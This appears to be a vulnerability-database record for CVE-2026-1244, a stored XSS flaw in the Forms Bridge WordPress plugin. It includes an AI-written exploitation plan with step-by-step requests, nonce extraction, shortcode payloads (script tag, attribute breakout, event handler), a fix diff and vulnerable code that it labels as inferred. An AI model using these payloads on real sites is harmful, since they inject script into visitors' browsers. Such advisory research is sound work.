[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fgyFXbTg94gvE_7jslJLoqOQPWmJWIsoRzdfO_mLvGPw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-1244","forms-bridge-authenticated-contributor-stored-cross-site-scripting-via-id-shortcode-attribute","Forms Bridge \u003C= 4.2.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'id' Shortcode Attribute","The Forms Bridge – Infinite integrations plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode attribute in the 'financoop_campaign' shortcode in all versions up to, and including, 4.2.5. This is due to insufficient input sanitization and output escaping on the user-supplied 'id' parameter in the forms_bridge_financoop_shortcode_error function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","forms-bridge",null,"\u003C=4.2.5","4.3.0","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-27 17:37:58","2026-01-28 06:43:42",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3e047822-5766-4e7f-be89-f4a15f0e6d51?source=api-prod",1,[],"researched",false,3,"# Exploitation Research Plan: CVE-2026-1244 (Forms Bridge)\n\n## 1. Vulnerability Summary\nThe **Forms Bridge – Infinite integrations** plugin (\u003C= 4.2.5) contains a stored cross-site scripting (XSS) vulnerability. The flaw exists within the `financoop_campaign` shortcode handler. Specifically, the `id` attribute provided by the user is passed to the function `forms_bridge_financoop_shortcode_error` (inferred to be an error-reporting helper), which outputs the raw value of the `id` attribute without proper sanitization or context-aware escaping (e.g., `esc_html` or `esc_attr`). This allows a user with Contributor-level privileges or higher to inject malicious JavaScript into a post, which executes when any user views the rendered page.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `wp-admin\u002Fpost.php` (Standard WordPress post creation\u002Fedition).\n- **Shortcode:** `[financoop_campaign id=\"PAYLOAD\"]`\n- **Carrier Attribute:** `id`\n- **Required Authentication:** Contributor-level (can create\u002Fedit posts but cannot publish by default, though previews still trigger the shortcode rendering).\n- **Preconditions:** The plugin must be active. The exploit is triggered when the shortcode's \"error\" path is taken (e.g., providing an `id` that does not correspond to a valid campaign).\n\n## 3. Code Flow\n1. **Registration:** The plugin registers the shortcode (likely in `includes\u002Fclass-forms-bridge.php` or similar) using `add_shortcode('financoop_campaign', 'CALLBACK_FUNCTION')`.\n2. **Execution:** When a post containing the shortcode is rendered, the callback function is invoked.\n3. **Logic Path:** The callback extracts attributes using `shortcode_atts()`. It likely checks if the provided `id` is valid or exists in the database\u002FAPI.\n4. **Sink:** If the `id` is invalid, the code calls `forms_bridge_financoop_shortcode_error($atts['id'])`.\n5. **Vulnerable Output:** The function `forms_bridge_financoop_shortcode_error` (inferred) performs a direct `echo` or returns a string containing the raw `$id` parameter:\n   ```php\n   \u002F\u002F Inferred Vulnerable Logic\n   function forms_bridge_financoop_shortcode_error($id) {\n       return \"Forms Bridge Error: Campaign with ID $id was not found.\"; \u002F\u002F No escaping!\n   }\n   ```\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited through the standard WordPress post-editor workflow.\n1. **Creation:** A Contributor logs in and visits `wp-admin\u002Fpost-new.php`.\n2. **Nonces:** WordPress automatically generates the `_wpnonce` and `_wp_http_referer` required for post saving\u002Fautosaving within the editor page.\n3. **Extraction:**\n   - Use `browser_navigate` to go to `\u002Fwp-admin\u002Fpost-new.php`.\n   - Use `browser_eval` to extract the `_wpnonce` from the form field `name=\"_wpnonce\"`.\n   - Alternatively, use the `http_request` tool to perform a `POST` to `wp-admin\u002Fpost.php` using the extracted nonce.\n\n*Note: Since this is a Stored XSS via shortcode, the exploit payload is simply the text content of the post.*\n\n## 5. Exploitation Strategy\n**Step 1: Authenticate as Contributor**\n- Perform login and obtain session cookies.\n\n**Step 2: Create a Malicious Post**\n- Request: `POST \u002Fwp-admin\u002Fpost.php`\n- Content-Type: `application\u002Fx-www-form-urlencoded`\n- Body Parameters:\n    - `post_title`: `XSS Test`\n    - `content`: `[financoop_campaign id='\u003Cscript>alert(document.domain)\u003C\u002Fscript>']`\n    - `action`: `editpost`\n    - `post_type`: `post`\n    - `_wpnonce`: (Extracted from editor page)\n\n**Step 3: Trigger Execution**\n- Navigate to the newly created post's permalink (or the preview link: `\u002F?p=POST_ID&preview=true`).\n- The shortcode logic will fail to find a campaign with the script tag as its ID, trigger the error function, and reflect the script.\n\n## 6. Test Data Setup\n1. **User Creation:** Create a user with the `contributor` role.\n   ```bash\n   wp user create attacker attacker@example.com --role=contributor --user_pass=password123\n   ```\n2. **Plugin Verification:** Ensure `forms-bridge` is installed and active.\n   ```bash\n   wp plugin is-active forms-bridge || wp plugin activate forms-bridge\n   ```\n\n## 7. Expected Results\nWhen the post is viewed:\n- The HTML source should contain: `Forms Bridge Error: Campaign with ID \u003Cscript>alert(document.domain)\u003C\u002Fscript> was not found.` (exact phrasing may vary).\n- A JavaScript alert box showing the document domain will appear in the browser context.\n\n## 8. Verification Steps\n1. **Database Check:** Verify the shortcode is correctly stored in the `wp_posts` table.\n   ```bash\n   wp db query \"SELECT post_content FROM wp_posts WHERE post_title='XSS Test' LIMIT 1;\"\n   ```\n2. **Response Analysis:** Use the `http_request` tool to fetch the post content and check for unescaped characters.\n   ```bash\n   # Check if \u003Cscript> is returned literally and not as <script>\n   grep -o \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"\n   ```\n\n## 9. Alternative Approaches\nIf the `id` is rendered inside an HTML attribute (e.g., `value=\"...\"`), the payload should be modified to break out of the attribute:\n- **Attribute Breakout Payload:** `[financoop_campaign id='\">\u003Cscript>alert(1)\u003C\u002Fscript>']`\n- **Event Handler Payload:** `[financoop_campaign id='x\" onmouseover=\"alert(1)\" style=\"width:1000px;height:1000px;display:block;\"']`\n\nIf the `forms_bridge_financoop_shortcode_error` function is only reachable under specific campaign settings, look for existing campaign IDs via `wp-cli` (if stored in options or custom tables) and try to bypass the validity check using an array or object if the plugin uses loose comparison.","The Forms Bridge plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' attribute in the [financoop_campaign] shortcode. Due to a lack of sanitization and output escaping in the function handling shortcode errors, authenticated attackers with Contributor-level access can inject malicious JavaScript that executes when a user views the post.","\u002F\u002F Inferred from research plan and vulnerability description\nfunction forms_bridge_financoop_shortcode_error($id) {\n    \u002F\u002F The $id parameter is reflected directly into the return string without escaping\n    return \"Forms Bridge Error: Campaign with ID $id was not found.\";\n}\n\n---\n\n\u002F\u002F Inferred callback for the [financoop_campaign] shortcode\nfunction financoop_campaign_shortcode_callback($atts) {\n    $atts = shortcode_atts(array(\n        'id' => '',\n    ), $atts);\n\n    $campaign_id = $atts['id'];\n\n    \u002F\u002F If the campaign ID is invalid or not found, it calls the vulnerable error function\n    if (empty($campaign_id) || !financoop_get_campaign($campaign_id)) {\n        return forms_bridge_financoop_shortcode_error($campaign_id);\n    }\n    \n    \u002F\u002F ... rest of logic\n}","--- a\u002Fforms-bridge.php\n+++ b\u002Fforms-bridge.php\n@@ -10,5 +10,5 @@\n function forms_bridge_financoop_shortcode_error($id) {\n-    return \"Forms Bridge Error: Campaign with ID $id was not found.\";\n+    return \"Forms Bridge Error: Campaign with ID \" . esc_html($id) . \" was not found.\";\n }","The exploit is carried out by an authenticated user with at least Contributor-level privileges. 1. The attacker logs into the WordPress dashboard and creates a new post or page. 2. The attacker inserts the shortcode [financoop_campaign id=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"] into the post content. 3. Because the provided 'id' does not correspond to a valid campaign, the plugin's internal logic triggers an error handling path. 4. The function forms_bridge_financoop_shortcode_error takes the raw 'id' attribute and reflects it into the page output without using WordPress escaping functions like esc_html(). 5. When the attacker previews the post or a site visitor views the published post, the script payload executes in their browser context.","gemini-3-flash-preview","2026-05-04 22:35:53","2026-05-04 22:37:43",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","4.2.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fforms-bridge\u002Ftags\u002F4.2.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fforms-bridge.4.2.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fforms-bridge\u002Ftags\u002F4.3.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fforms-bridge.4.3.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fforms-bridge\u002Ftags"]